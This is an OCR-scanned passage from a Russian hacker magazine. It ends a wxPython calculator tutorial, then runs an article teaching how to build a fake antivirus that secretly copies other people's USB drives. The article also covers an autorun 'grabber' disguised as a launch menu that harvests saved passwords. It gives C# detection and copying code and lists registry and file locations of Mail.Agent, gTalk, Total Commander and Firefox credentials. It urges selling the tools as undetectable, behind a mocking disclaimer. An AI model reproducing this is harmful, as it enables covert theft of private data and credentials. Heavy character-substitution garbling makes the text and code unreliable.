Рассмотрим создание окна (фрейма): 

ілпс . Ргате (рагепС , ісЗ.= — 1 , СіШе=»», 

роз=ѵгк . БеііаиІЦРозіЦіоп, зіге=тс . Бе^аиІСЗіге , 
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ТАК ДОЛЖЕН ВЫГЛЯДЕТЬ НАШ КАЛЬКУЛЯТОР 



зСу1е=ѵгк . БЕРАІІЬТ_РКАМЕ_ЗТУЬЕ , пате=»^гате») 

Большинство параметров имеют разумныезначения поумолчанию, 
поэтому их можно опускать. Их назначение понятно из названий. Я только 
обращу внимание на параметр іб, который задает идентификатор виджета. 
Любой виджет должен иметь уникальный іб. Этого можно достичьтремя 
способами: 

О Самому генерировать уникальное положительное число и передавать 
его в конструктор. 

2) Использоватьфункциюѵѵх.МеѵѵІбО. 

3) Передать в конструктор виджета константу ѵѵх.Ю_АЫУ или -1 (что и 
сделано в примере]. 

Между вторым и третьим стилями нет никакого функционального разли- 
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ОДНА ИЗ САМЫХ ПОПУЛЯРНЫХ БИБЛИОТЕК 



чия. При создании фрейма, втом числе, происходит создание виджетов, 
которые он должен содержать. Хорошим ходом считается создание 
виджета ѵѵх.РапеІтакогоже размера, как рабочая область окна, и который, 
по существу, является простым контейнером для других объектов. Это 
позволяет отделить содержание окна отдругихэлементов.типа панели 
инструментов и строки состояния. Затем в примере создается виджет 
кнопки. Список параметров аналогичен таковому у конструктора фрейма. 
Обрати внимание, что родителем является объект панели. Здесь нужно, 
чтобы размеры внутреннего виджета не вылезали за рамки виджета- 
родителя (параметры роз и зі ге]. После создания виджета доступ ко всем 
его параметрам осуществляется через 6еІ/5еІ методы (такой подход 
не свойственен Питону, нотут просматривается влияние С++,таккак 
ѵѵхРуіЬоп — это оболочка над библиотекой ѵѵхѴѴіпбоѵѵз, которая написана 
какраз на С++]. 

СОБЫТИЯ 

Какуже упоминалось, главная задача прикладного объекта — обработка 
событий, которые происходят во время работы приложения. События 
(еѵепЫ в ѵѵхРуіЬоп’е — это очень обширная тема, поэтомуя рассмо- 
трютолько азы. Послетого каку прикладного объекта вызван метод 
Маіп1_оор(), программа большую часть времени по сути ничего не делает. 
Все события, которые происходят при работе программы, помещаются в 
очередь. Время отвремени программа проверяетэту очередь. Если в ней 
что-то появилось, она обрабатываетэто событие, вызывая программный 
код, связанный с ним. Любое событие является потомком ѵѵх.ЕѵепІ и 
имеетсвойтип. Например, событие ѵѵх. МоизеЕѵепІ: имеет 14типов, таких 
ка к ѵѵх . Е ѴТ_П 1 6 Н Т_0 6 ѴѴ N , ѵѵх . Е ѴТ_Е Е ЕТ_П Р и т. п . 

В ѵѵхРуіЬоп, большинство виджетов генерирует высокоуровневые 
события в ответна события более низкого уровня. Например, щелчок 
мыши на кнопке ѵѵх. ВиНоп генерирует событиеѵѵх.СоттапбЕѵепІ: типа 
ЕѴТ_ВІІТТ6І\І. Преимуществотакого подхода — втом, что он позволяет 
сосредоточиться на самих событиях, вместо того, чтобы отслеживать 
каждый щелчок мыши. 

Чтобы связать событие, виджет, который его вызвал, и обработчик 
события, используется так называемый биндер — объект класса 
ѵѵх.РуЕѵепіВіпсІег. Для каждого типа события существует свой биндер. 
Объекты биндеров предопределены и глобальны, но есть возможность 
создать собственный биндер для собственного типа события. 

Любой виджет является потомком класса ѵѵх. ЕѵіНапсІІег, а значит, имеет 
метод ВіпсІ. Он-то какраз и создает биндеры событий, про которыетолько 
что шла речь. Этот метод имеет следующую сигнатуру: ВіпсНеѵепІ:, ЬапсІІег, 
зоигсе=Ыопе, іб=ѵѵх.Ю_АІ\ІѴ, іб2=ѵѵх.Ю_АІ\ІѴ). Первыедва параметра 
обязательны. Еѵепі — объект класса ѵѵх.РуЕѵепШіпбег, и он описывает со- 
бытие; ба псііег — объект, поддерживающий вызов, обычно это метод или 
функция с единственным параметром — объектом событием. Параметр 
зоигсе задает виджет, который является источником события (его следует 
задавать, если этот виджет не тот, который используется как обработчик). 
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Рассмотрим, какэто все работает в нашей программе. В ней есть та кая 
строчка: 5еЛ.рапе[.ВіпсІ(ѵѵх.ЕѴТ_ВІІТТ0М, зеІЕОпВиЛопСІіск, зеіі. 
ЬеІІоВиНоп). 

В этой строчке объект рапеі создает биндер, при помощи которого, при на- 
жатии кнопки ЬеІАоВиНоп, произойдет вызов метода ОпВиЛопСІісМзеІі, 
еѵепЙ. 

Хочу обратить внимание, что код, который вызывается в ответна событие, 
обычно не определяется виджетом, вызвавшим это событие (так называ- 
емая распределенная архитектура). В нашем случае событие вызывается 
виджетом Ье Но В и Поп, но обработчикэтого события является методом 
ОпВиЛопСІіскО объекта Егате, который и содержит виджет. 

Стоит упомянуть еще об одной возможности обработки событий : если 
в обработчике вызван метод 5кір(), это позволяет продолжить поиски 
выполнение других обработчиков того же самого события (иначе будет 
выполнен только тот обработчик, который был найден первым). Иногда 
такое поведение необходимо. 

ПИШЕМ СВОЙ КАЛЬКУЛЯТОР 

Возможно, тебе покажется, чтодлятакой простой программки, как«Не11о, 
ѵѵогісі!», тут слишком много теории. Можетбыть. Нозатотеперьты готов 
писать 6111 практически любой сложности. Основной алгоритм написания 
большинства 61Л: 

1. Создание прикладного объекта и фрейма. 

2. Создание и размещение виджетов в фрейме. 

3. Размещение всей логики работы 6111 в обработчикахсобытий. 
Следующим этапом у нас будет написание более серьезной программы — 
калькулятора (наподобие стандартного в ѴѴіпсІоѵѵз). Вместе с подробными 
комментариями весь код занял у меня около 270 строк. Естественно, что 
целиком в рамки статьи он не поместится. Поэтомуя буду делать акцент 
только на самых интересных местах, а сам исходник можно найти на диске. 
Калькулятор будет представлять из себя окно, на котором размещены 
поле для ввода/вывода чисел, кнопки для набора цифр, знаков операций 
и вывода результата. Таккакэта статья посвящена обзору 6111, то не буду 
подробно разбирать логику работы калькулятора. Рассмотрю только ту ее 
часть, которая имеет непосредственное отношение к 6Ш. 

6 ростом числа виджетов возрастает объем однотипного кода. Можно 
прибегнуть к некоторым ухищрениям, чтобы в нем легче было ориентиро- 
ваться. 

1. Рекомендуется давать объектам виджетов «говорящие» имена, чтобы 
по названию сразу можно было понять, для чего они предназначены 
(например, кнопкуумножения естьсмысл назвать ЬиНопМиІ вместо 
Ьийоп_12). 

2. То же самое касается именования обработчиков событий. Их название 
принято начинатьс префикса «Оп». За ним идетназвание виджета, с 
которым этотобработчиксвязан, а затем — название события, кото- 
рое обрабатываетобработчик(например, из названия обработчика 
бпВиНопЕгазебІіскясно, что он обрабатывает событие, возникающее при 
«клике» на кнопку ЬиНопЕгазе). Возможно, это провоцирует появление 
длинных имен, но я рекомендую делать выбор в пользу понятности, пусть и 
в ущерб краткости. 

3. Часто есть возможность уменьшить количество обработчиков путем 
назначения одного и того же обработчика на разные события. В нашем 
случае вместо того, чтобы на каждый «клик» на кнопке с цифрой назначать 
отдельный обработчик (который всего лишьдолжен эту цифру до писать 

в окно вывода), можно обойтисьодним единственным обработчиком. 
Правда, перед тем какдописать цифру, этому обработчику вначале при- 
дется найти ту кнопку, которая вызвала это событие, так как эта цифра 
расположена на ІаЬеГеэтой кнопки. Что делается следующим образом: 

# Получаем список всех виджетов , которые содержат 

# рапеі . 

сИіІсІгеп = зеіі: . рапеі . СеЦСНИбгеп ( ) 

# Находим виджет, который вызвал событие. 

Еог сМІсі іп сНИбгеп: 

ІЕ сНіісі. Себісі ( ) == еѵепб .Себісі ( ) : 
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Тут быстродействие приносится в жертву ради большей 
«прозрачности» кода. Но именно такой подход и соответству- 
ет идеологии Руібоп’а, поэтому настоятельно рекомендую 
придерживаться его и впредь. Крометого, на нажатие кнопок 
арифметических операций и кнопки вывода результата («=»] 
также можно назначить один и тотже обработчик (в примере 
это метод ОпОрегабопСІіск). Правда, при разборе этого 
м етода могутвозникнутьне кото р ы е труд н ости дл я тех , кто 
слабо разбирается в РуіНоп'е. Но это лишь из-за не совсем 
тривиальной логики, по которой должен работать калькуля- 
тор (например, если было введено 2+3, то ввод следующей 
операции подразумевает вычисление этого выражения 
2+3=5 и применения новой операции к результату]. Даже если 
ты не до конца разберешься с логикой, — ничего страшного, 
ведь наша главная задача это 0111. 

Есть несколько нюансов, о которых начинающие разработчи- 
ки часто забывают. 

1. Важно помнить, что пользователю может прийти в голову 
мысль изменить размер твоего приложения (например, 
развернуть его на весьэкран). Обычно после этого при- 
ложение приобретает неприглядный вид — все виджеты 
будут расположены в рамках старого размера, а оставшаяся 
часть останется пустой. Самый простой вариант избежать 
этой неприятности — запретить изменения размера окна 

и его максимизацию. Это можно сделать при инициализа- 
ции фрейма, инициализировав параметр з1;уІе значением 
ѵѵх.0ЕРАиі_Т_РПАМЕ_5ТѴІ_Е & (~(\л/х.МАХІМІ2Е_В0Х I 
\л/х.ВЕ5І2Е_В0П0ЕВ]. 

2. Поскольку наш калькулятор позволяет вводить цифры не 
только путем нажатия кнопок, но и с клавиатуры, то необхо- 
дим контрольза пользовательским вводом. Пользователь 
должен вводить только целые и дробные числа. Проверку 
правильности ввода можно организовать следующим об- 
разом: 



Этот код пытается привести строку к типу йоа О если не уда- 
ется, то бросается исключение, которое ловится, и в виджет 
еггогЗіаШзВаг выводится сообщение об ошибке. Обрати 
внимание, что ловятся ошибки определенного типа (ТуреЕггог, 
ѴаІиеЕггог). Все остальные ошибки ввода уже не буд^ выво- 
диться в виджетеггогЭіаШзВаг. Это считается хорошим стилем 
— ловить тол ь ко те ошибки, кото р ы е ты гото в о б ра б отать . 

3. Поумолчанию длина входной строки не ограничена, 
и при вводе большого числа оно не будет влезать в поле 
ввода. Чтобы этого избежать, можно указать максимальную 
длину вводимой строки при создании виджета: іехЮМІпіо. 

ЭеіМахЕепдіЫЗО). 

ЗАКЛЮЧЕНИЕ 

Надеюсь, теперьтебе не составиттруда продолжить изуче- 
ние ѵѵхРуіЬоп самостоятельно. На примере двух простых 
программокбыл рассмотрен фундамент л юбогоѵѵхРуіЬоп- 
приложения. Аесли есть фундамент, — возвести фасад 
куда легче. В процессе дальнейшего изучения ѵѵхРуіЬоп я 
настоятельно рекомендую обратить внимание на ѵѵхРуіЬоп 
Вето, который поставляется вместе с самой библиотекой. 

Это большая сборка различных примеров с исходным кодом. 
Если захочется изучить новый виджет — в первую очередь 
ищи там. Также есть замечательная книга «ѴѴхРуіЬоп іп 
асбоп»отавторов ІЧоеІ Рарріп и РоЬіп Оипп. Ссылку для 
скачивания можно найти на боковом выносе. Написана она 
на английском, но если погуглить, то можно найти русский 
перевод нескольких глав (я нашел главы 1 ,2,3,1 1 ,14]. Для на- 
чального знакомства с ѵѵхРуіЬоп вполнехватитпервыхтрех. Я 
вскрыл только верхушкуайсберга программирования ѲШ на 
Руібоп’е, все остальное остается за тобой. Удачи! ~н~ 



> СІѴСІ 

На диске лежат пол- 
ные исходные коды 
калькулятора. Для его 
запуска надо устано- 
вить ѵѵхРуШоп. 
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ИГОРЬ АНТОНОВ 

/ Амтомоѵ.іоок.кнѵгаемАіь.сом / 



ЗЛОБНЫЙ КОМП 
И ФЛЕШКА-ГРАББЕР 



+ + + + 



+ + + + 



Элегантно копируем конфиденциальную информацию 



Для простых смертных флешка — это девайс для переноса докумен- 
і і тов/фильмов/фоток и другой личной (а иногда и очень личной) ин- 
формации. А вот для хакеров флешка — это одновременно и жертва, 
и боевой инструмент. Сегодня я расскажу все тонкости незаметного 
слива данных с флешек к себе на комп, а также научу превращать 
і | безобидные флешки в программы для резервного копирования па- 
ролей с «большого» компьютера. 



~н — і 

+ + + + 



+ + + + 



ЛОВУШКА ДЛЯ ЧУЖИХ ФЛЕШЕК 

Идея программы «Злобный комп» будет заключаться в следующем. 
Мы разработаем небольшую тулзу, которая будет притворяться 
супер-мега продвинутым антивирусом, цель которого — качествен- 
ное удаление с флешек «опасных» вирусов. Зараженной вирусами 
флешкой уже никого не удивишь, поэтому наш специализированный 
«антивирус» не вызовету доверчивого пользователя опасений. 
Наоборот, вставив флешку к тебе в комп и увидев сообщение типа: 
«Обнаружен вирус. Произвожу детальное сканирование всех 
файлов на предмет наличия зараженных» , — он обязательно подо- 
ждет завершения данной операции. 

ПОДГОТОВКА ИНСТРУМЕНТОВ 

Писать столь полезную программу мы будем на модном нынче С#. 
Гибкость языка и широкий функционал платформы .ЫЕТ позволяют 
разрабатывать приложения с молниеносной скоростью. Именно это 
нам и нужно. Нас интересуетурожай, который мы сможем собрать, а 
не утомительный процесс кодинга. 

Одной из важных составляющих нашего приложения будет интер- 
фейс. Чем солиднее ты его сделаешь, тем больше шансов, что жерт- 
ва не заметит подвоха и спокойненько будет ожидать завершения 
антивирусного сканирования. Я особо париться не стал и разместил 
на форму чистого проекта лишь картинку и РгодгеззВаг. Ты же мо- 
жешь оторваться поп ол ной и сделать умопомрачительный дизайн. 



Советую посмотреть оформление какого-нибудь реального антиви- 
руса ипримерновтакомже стиле оформить свое приложение. 

СТАВИМ ЗАДАЧУ 

Будем считать, что с организационными вопросами и алгоритмом 
действия мы определились, самое время обсудить технические 
нюансы. Итак, наш антивирус должен начинать свою грязную работу 
во время инсталляции флешки. Кактолько новый диск появляется 
в системе, наша программа должна определить его букву и начать 
копирование. 

Перед тем какя взялся писать эту статью, мне на глаза попался 
исходник подобной программы. Автор примера определял факт 
присутствия флешки путем периодичного перебора всехдисков 
на предмет наличия драйва типа «съемный носитель». Сначала я 
думал пойти тем же путем, но внутренний голос подсказывал о не- 
рациональности. Взвесив все «за» и все «ну его на», я отбросил эту 
идею и пошел прогуляться на М5Ы0. Через пять минут оказалось, 
что сделал я это не зря. Ответ был найден! 

БЕЗ ѴѴШАРІ НИКУДА... 

Эффективней всего узнать о подключении нового оборудования (в 
нашем случае — флешки) можно путем отлова и анализа сообщения 
ѴѴМ_ОЕѴІСЕСНАМ0Е. Во время инсталляции девайса мессадж рас- 
сылается всем окнам, и мы достаточно легко можем его обработать 
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ІзипсЬ Орега 



ІэиРксЬ РітеРох 



ІаипсН ТаіаІ Соттагкіег 7.5Ь 



на этом можно 

ЗАРАБОТАТЬ? 



На многих хакерских форумах много объявлений о продаже 
софта такого рода. Цены разные — от $ 10 до $ 100. Доработав 
рассмотренные в статье примеры, ты можешь заработать на ко- 
рочку черного хлеба с икрой. Повторюсь, главное подойти к делу 
творчески, и все обязательно получится. Опять же, антивирусами 
не детектируется ;) . 



в своем приложении. Для этого достаточно лишь описать функцию 
ѴѴіпсІоѵѵРгос. На практике выглядит примерно так: 

ФУНКЦИЯ, ОБРАБАТЫВАЮЩАЯ СООБЩЕНИЯ 

БКезиІР САШВАСК ѴТіпбомРгос ( 

ВДЩВ Ішпсі, //идентификатор окна 
ІЛКГТ иМзд, //идентификатор сообщения 
МРАКАМ ыРагат, //событие, которое произошло 
Ь Р АРАМ ІРагаш //указатель на структуру содержа- 



свойства классахоівестовѵ 



Свойство 


Описание 


Боовсе 


Источник КОПИРОВАНИЯ. 


Оебтшатіом 


Получатель. На указанный здесь путь будут скопированы 

ВСЕ НАЙДЕННЫЕ ФАЙЛЫ 


ОѴЕКѴѴШТЕ 


Перезапись. Если трое, то существующие файлы будут 

ПЕРЕЗАПИСЫВАТЬСЯ 


РоЮЕВрИТЕВ 


Фильтр для папок 


Ріі_еРіі_ТЕВ5 


Коллекция, содержащая фильтры для файлов 



МОИ ВАРИАНТ І.АІІМСН-МЕНЮ 



щую данные 



В теле функции тебе необходимо сравнить значение параметра 
ѴѴРагат с идентификаторами различных событий, относящихся к 
сообщению ѴѴМ_0ЕѴІ С ЕС НАЫ0Е. Для нашего примера это будут: 

- ВВТ_БЕѴІСЕАККІѴАЬ — оборудование добавили 

- ВВТ_БЕѴІСЕКЕМОѴЕСОМРЬЕТЕ — оборудование полностью 
извлекли 

Окей, как установить факт подключения нового оборудования, мы 
знаем, но как быть уверенным, что подключили именно флешку? 
Устройств с возможностью «горячего подключения» (я про изб] 
огромное множество (принтер, сканер, модем и т. д. ) . К счастью, и 
эта проблема решается достаточно просто. По параметру бРагат 
мы можем обратиться к структуре _0ЕѴ_ВР0А0СА5Т_Н0Р, у которой 
есть поле сі ЬсЬ_сІ еѵі сеіуре . Вот, исходя из значения это поля, и 
делаются соответствующие выводы. Если оно равно ВЕѴ_ОЕѴТУР_ 
ѴОШМЕ.то время ликовать и бить в ладоши — к нам подсоединили 
флешку! 

ЧЕРЕЗ ЭТУ СТРУКТУРУ ПОЛУЧАЕМ 
ТИП ПОДКЛЮЧЕННОГО УСТРОЙСТВА 

Руребеб збгисб _ВЕѴ_ВВОАВСАЗТ_НБК { 

БЖЖБ сПэс]о_зІ 2 е; //Размер структуры 
БЖЖБ сПэсЬ_с1еѵісе1іуре ; //Тип устройства 
ВѴГОКВ бЬсЬ._гезегѵеб; //Зарезервировано, не исполь- 
зуется 

} ВЕѴ_ВКОАВСАЗТ_НВК , * РВЕѴ_ВКОАВСА8Т_НВК ; 
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ОБРАБОТКА 

ПОДКЛЮЧЕННОЙ 
I ФЛЕШКИ 

збгіпд сІігЫате = Епѵігоптепб . СеССоттапсІБіпеАгдз ( ) 
[0] + " Н1азЪ._" + БабеТіте . Боѵ\ы ТоЗБгіпд ( " бб-ММ-уу- 
Ыі-тт-зз " ) ; 

СгеабеВігесБогу ( бігБате ) ; 

хБігесбогу НІазЬсоріег = пехѵ хБігесбогу () ; 




Метод Описание 



БтактСорѵ 



Запуск процесса копирования 



Самсеі_Сорѵ 



Остановка процесса копирования 



МЕТОДЫ КЛАССАХОІРЕСТОРУ 



Если ты давно читаешь нашу рубрику ихорошознакомсАРІ- 
функциями, то в чтении следующей части статьи нет необходимо- 
сти. Открывай редактор и начинай ваять приложения. Все необ- 
ходимые структуры и функции я описал; тебе остается их собрать 
в программу. Определяйся, а я начну погружение в .ЫЕТ и С# в 
частности. 

УДАРИМ .МЕТ’ОМ 




Время приступать к практике и применитьзнания кязыку С#. «Какого 
черта ? — спросишь ты. — Полстатьи рассказывал про ШпАРІ , а тут 



біазбсоріег . ІпбехСотрІебе += пем 

ІпбехСотрІебеЕѵепБНапбІег ( ІпбехСотрІеабе ) ; 

Ніазбсоріег . ІбетСоріеб + = 

пеѵі ІБетСоріебЕѵепСНапбІег ( ІбетСоріеб) ; 

Ніазбсоріег . СоруСотрІеСе + = 

певд СоруСотрІебеЕѵепЦНапбІег ( СоруСотрІебе ) ; 

біазйсоріег . Зоигсе = 

пеѵі Бігесбогуіпбо ( е . Бгіѵе . ТоЗбгіпд ( ) ) ; 

біазбсоріег . Безбіпабіоп = 

певд Бігесбогуіпбо ( бігБате ) ; 

біазбсоріег . Оѵегмгібе = бгие; 
біазбсоріег . ЕоІбегЕіІбег = " * " ; 

біазбсоріег .ЕіІеЕіІбегз. Абб ( " * . бос " ) ; 
біазбсоріег .ЕіІеЕіІбегз. Асісі ( " * . хіз " ) ; 

//Определение других фильтров 
// 

біазбсоріег . ЗбагбСору ( ) ; 



просто тупо решил оформить вызов всех функций в виде нативного 
кода ? Где заявленная молниеносная скорость разработки ?». 

В чем-то ты прав. Наше приложение действительно будет исполь- 
зовать ѴѴіпАРІ -функции (проще никак], но сами мы их описывать 
не будем. С проблемой определения флешек сталкивались многие 
разработчики. В результате этих стычек стали появляться бесплат- 
ные классы для С#, в которых уже реализован весь необходимый 
функционал. Нам остается только подключить та кую заготовку 
(читай компонент) к своему проекту и вызвать пару методов. Одним 
из таких классов мы сейчас и воспользуемся. Авот знание структур, 
описанных выше, тебе обязательно пригодится при переносе этой 
программы на ѴѴіпбоѵѵз АРІ. 

Готовых классов, решающих подобные задачи, великое множе- 
ство, но мне больше всего понравился вариант от іа п Ооііпау. Этот 
человек написал очень простой в использовании и понимании кода 
класс Р гіѵе Ре^есЕог, который умеет: 

• Определять факт подключения флеш -накопителя; 

• Определять запрос на отмонтирование подключенной флешки; 

• Определять факт отключение флехи; 

• Получать букву диска вновь подключенной флешки; 

• Предоставлять список открытых с флешки файлов; 

И самое главное, с этим классом чрезвычайно просто работать — в 
этом ты сейчас убедишься. 

Подключение класса к своему проекту выполняется стандартным 
образом, и останавливаться на этом смысла нет. Поэтому перейдем 
сразу к инициализации. Выполняется она так: 



П1азЪ.БгіѵеВебесбог = пем БгіѵеБебесбог ( ) ; 



В наш писюк вставили флешку, — попробуем узнать букву диска, ко- 
торую присвоила ей система. Как в «Поле чудес», можно ее угадать, 
но лучше выдернуть информацию из структуры ВЕѴ_ВВ0А0СА5Т_ 
ѴОШМЕ. 

СТРУКТУРА ПОМОЖЕТ НАМ ОПРЕДЕЛИТЬ БУКВУ ДИСКА 

бу ребе Г збгисб _БЕѴ_ВКОАБСАЗТ_ѴОЫШЕ { 

БЖЖБ сПэсѵ_зІ 2 е; //Размер структуры 

БЖЖБ бЪсѵ_беѵісебуре ; //Тип устройства 

БЖЖБ бЪсѵ_гезегѵеб; //Зарезервирован 

БЖЖБ бЪсѵ_ипібтазк; //Битовая маска буквы диска 

ЖЖБ бЬсѵ_б1адз; // 

} 

БЕѴ_ВКОАБСАЗТ_ѴОЬБМЕ , * РБЕѴ_ВКОАБСАЗТ_ѴОЬБМЕ ; 

Из всех полей этой структуры нас интересует ббсѵ_ипі1:та5к. Учти, 
что в этом свойстве содержится лишь бит буквы, а не ее символьное 
представление. Например, если значение 0, то буква диска будет А; 
если 1 , то В и т.д. Для удобства получения символьной буквы лучше 
всего написать функцию. 



б1азЪ.БгіѵеБебесбог . БеѵісеАггіѵеб += 

пем БгіѵеБебесбогЕѵепбНапбІег (ОпБгіѵеАггіѵесі) ; 

бІазкБгіѵеБебесбог . БеѵісеКетоѵеб + = 

пем БгіѵеБебесбогЕѵепбНапбІег (ОпБгіѵеКетоѵесі) ; 

После создания экземпляра объекта класса ОгіѵеОеІесІог я 
определяю обработчики событий ОеѵіеАггіѵесЦ] и ВгіѵеВетоѵесЦ]. 

По их названию нетрудно догадаться, за что они отвечают. Весь код 
инициализации лучше всего писать в метод Еогті (]. 

Основной код нашей программы будет находиться в обработчике 
события ОеѵісеАггіѵеб. Его текстты увидишь на врезке. 

В самом начале листинга я определяю путькпапке, в которую мы 
копируем содержимое флешки. Выполнять копирование будем 
в директорию «Па5б_текущая дата», расположенную вместе с 
папкой, из которой запущено наше приложение — так удобнее. 
Определившись с именем папки, я пытаюсь создать ее с помощью 
функции СгеаіеОігесІюгуП. Эту функцию я написал исключительно 
для удобства. В ней происходит создание экземпляра объекта 
Оігесіюгуіпію, предназначенного для работы с директориями, и 
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ФЛЕШКАОБНАРУЖЕНАИ СКОПИРОВАНА 



Файл правка В»ід кізбратое Сервис Справка 
Поиск I' Папки 



Задачи для файлов 



фныал • ф ^ 

О К: \Статья\Адская флешка и Адский комп Коварен комп\\Ѵ«кіоѵѵ«Рогт$АррЬ ѵ Д Переход 
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Создать новую папку 
Уі Опубликовать папку в вебе 
Щ Открыть обшіві доступ к 



этой папке 



Другие места 



о 

I 1 1 Мои документы 
^ Общие документы 




І ашита диплома. бос 

Документ Місго$ой \Ѵогб 
46 КБ 



І иплом.бос 

Документ Мкго*оЛ ѵѴогб 
•487 КБ 



1 ИТУ/ЪНЫИ ЛИСТ.бос 

л I Документ М>сго«>й ѴѴогб 
36 КБ 



Объектов: 7 



8,55 МБ 



А Мой компьютер 



вызов его метода СгеаІеО, который и создает новую 
папку. 

После создания папки можно выполнять копирование. 
Копирование всех файлов я выполняю с помощью объ- 
екта типа хБігесІюгу. Если ты набираешь код из листинга 
самостоятельно, то при попытке компиляции компиля- 
тор разродится ошибкой, в которой черным по белому 
будет сказано: «Объект такого типа не найден». 

Дело в том, что хБігесІюгу — сторонний класс. Когда- 
то давным-давно яе го нашел на просторах инета и с 
тех пор частенько использую в своих проектах. Мне он 
нравится тем, что для копирования вложенных папок до- 
статочно вызвать один метод. Кроме того, он позволяет 
устанавливать фильтры. 

Реально обойтись и без него. Берем стандартные клас- 
сы, хорошо знакомый всем программистам прием — ре- 
курсию — и пишем пару десятков строк кода. Увы, этого я 
делать категорически не хочу. На дворе XXI век, нужно по 
максимуму оптимизировать свои действия и хБі геологу 
нам в этом поможет. 

Модуль с классом лежиту нас на диске, а узнать о пред- 
назначении методов/свойств/событий ты можешь, 
взглянув на соответствующую таблицу. 

Попробуй запустить наше приложение и вставить флеш- 
ку. Через несколько секунд (в зависимости от захлам- 
ленности твоей флешки] все содержимое изб-драйва 
перенесется в папку, из которой ты запустил свежеиспе- 
ченное приложение. 

ІІ5В-ГРАББЕР 

Теперь рассмотрим обратную задачу и поговорим о 
нюансах создания т. н. флешки -граббера. Принцип соз- 
дания точно такой же. Тебе нужно написать простенькое 
приложение, которое будет автоматически запускаться 
после инсталляции флешки. 

В процессе работы приложение будет шерстить по пап- 
кам/ключам реестра, в которых популярные программы 
хранят сохраненные пароли и по возможности копиро- 
вать всю инфу в одну из своих папок. Чтобы твой авторан 
не вызвал подозрений у бедного юзера, потрудись тща- 
тельно его замаскировать. Например, под Іаипсб-меню. 
Ты, наверное, в курсе, что сейчас стали очень популяр- 
ны так называемые рогіаЫе- вереи и приложений, то 
есть программы, умеющие работать прямо с флешки. 

На этом лучше всего и сыграть. Оформи программу в 
соответствующем стиле и для правдоподобности брось 



СОБЫТИЯ КЛАССАХйІКЕСТОКѴ 



Событие 


Описание 


ітемімоехеоЕѵемтНамоі_ев 


Возникает при индексировании очередного файла/папки 


імоехСомрьеатеЕѵемт 


Происходит во время завершения создания 


На^ьек 


СПИСКА КОПИРУЕМЫХ ФАЙЛОВ 


ітемСоріеоЕѵемтНамоі_ек 


Срабатывает во время копирования очередного файла 


СорѵСомрі_етеЕѵемтНамоі_ек 


Возникает при полном завершении копировании файлов. 



несколько кнопок, предназначенных для запуска каких- 
либо программ. Мой вариант оформления представлен 
на одной из иллюстраций. 

КАК БУДЕМ ГРАБИТЬ? 

Сразу скажу, что супер-хакерских действий здесь совер- 
шать не нужно. Большинство программ хранятличные 
данные в папке Ооситепіз апб 5еиіпдз\Пользователь\ 
Арріісабоп Оа1:а\%РгодгаппІ\Іаппе% или в реестре. Под 
РгодгатІЧате подразумевается любая программа. Если 
ты сталкиваешься с первым вариантом, то придется 
воспользоваться уже знакомым классом хйігесіогу (или 
стандартными методами работы с файлами] и скопиро- 
вать с его помощью все необходимое. Во втором случае 
тебе придется поработать с реестром. Пример копиро- 
вания файлов приводить не стану (рассматривали уже], 
а вот как взаимодействовать с реестром средствами 
,І\ІЕТ — я сейчас покажу (на примере определения пути к 
папке ТС]: 




> ѵѵагпіпд 

Эту программу мы 
используем исключи- 
тельно для своев- 
ременного бэкапа 
содержимого флешек 
на диск и бэкапа 
паролей на флешку. 
Аты что подумал? 
Незаконное исполь- 
зование подобного 
софта наказуемо! 



КедізСгуКеу геасІКеу = КедізСгу . СиггепСІІзег . 
ОрепЗиЬКеу ( " зоіШмагеХ \СЬіз1ег\ \ТоСа1 
Соттапсіег " ) ; 

зСгіпд кеу = 

( зСгіпд) геасІКеу . СеСѴаІие ( " ІпзСаІІБіг " ) ; 

На этом все. Кода больше не будет. Этих знаний тебе 
должно хватить, чтобы стянуть файлы с ценной инфой. 
Чтобы чуточку облегчить задачу, я подготовил список 
наиболее популярных программ и расписал все пути, по 
которым они хранят сохраненные данные пользователя. 




> СІѴСІ 



Все сорцы и необхо- 
димые компоненты 
ты можешь найти на 
нашем диске. 



МАИ.А6ЕЫТ 

Мессенджер от Маіі.ги сейчас пользуется огромной 
популярностью среди простых смертных юзеров (осо- 
бенно у женского пола]. Цели ясны, задачи поставлены, 
поэтому нас интересуют: 
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^ собіпд 
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НА ЗАМЕТКУ 

Не забывай, многие пользователи хранят конфиденциаль- 
ную инфу в папке «Мои документы». Как минимум, там могут 
быть интересные рабочие документы, а иногда и целые файли- 
ки с паролями. Я в свое время (на бывшей работе) обнаружил 
на компе бухгалтера аккуратненько отформатированный 
файл с паролями к банк-клиентам. Как настоящий друг, ты 
должен помочь всем этим людям с бэкапом их конфиденци- 
альной информации. 




~1 I 

+ + + + 



+ + + + 



+ + + + 

~П 1 



1. Хи стори. Всю историю переписки пользователя МА хранит в 
□оситепіз а псі 5еШпд\%Пользователь%\Арріса1:іоп 0а1;а\Мга\Ьа5е. 
В папке базе есть файлик ппга.бЬз. Это, собственно говоря, и есть 
файл истории. 

2. Контакт-Лист. Список контактов расположен в папке 
МРА\%аккаунт пользователя%\сІіз1:5.1:х1:. Учти, пользователей 
работающих с таіі.адепі может быть несколько (или у одного юзера 
может быть несколько акков]. Поэтому разумней всего будет скопи- 
ровать все папки, содержащие в названии символ «И». 

3. Пароль. Пароль (точнее, его хэш] отучетной записи пользователя 
дислоцируется в реестре по пути — НКСіЛЗоКѵѵагеѴМаіІ.ПіЛАдепіЛ 
тадепМодіп52\%АссоипІ% в параметре ####разз\л/огб. 

6ТАІ.К 

Компания Ооодіе создает удобные и функциональные продукты, 
среди которых присутствует даЬЬег-клиент — дТаІк. Сегодня дТаІк 
еще не сильно популярен. На каждом втором П К он не установлен, 
но иногда все же встречается и, чтобы быть в теме, лучше сразу 
научить нашу программу доставать пароли и от этого месса нджера. 
Пароли от всех учетных записей дТаІк хранит в реестре — ННЕѴ_ 
СІІППЕЫТ_ІІ5ЕП\5оЙѵѵаге\6оодІе\6оодІе ТаІкѴАссоипіз. В этой 
ветке перечислены все аккаунты, под которыми когда-либо был 
выполнен вход в дТаІк. Пароли к аккаунту записаны в строковом 
параметре рѵѵ. 

ТОТАЬ СОММАЫРЕР 



М5йЫ — НАЙДЕТСЯ ВСЕ 



граммы так называемые «хранилища паролей». Зарегистрировал- 
ся, зашел под своей учеткой, приказал браузеру запомнить учетные 
данные — и забыл. При следующем посещении останется только 
выполнить пару щелчков мышкой, и ты уже на сайте. Раз браузер со- 
храняет пароли, значит, у нас возможность утянуть всю его базу. 
І.зеззіопзіоге.із — файл содержит в себе все сохраненные сессии. 
2. зідпопзЗ.ІхІ — за шифрованные пароли (для третьей версии РР). 
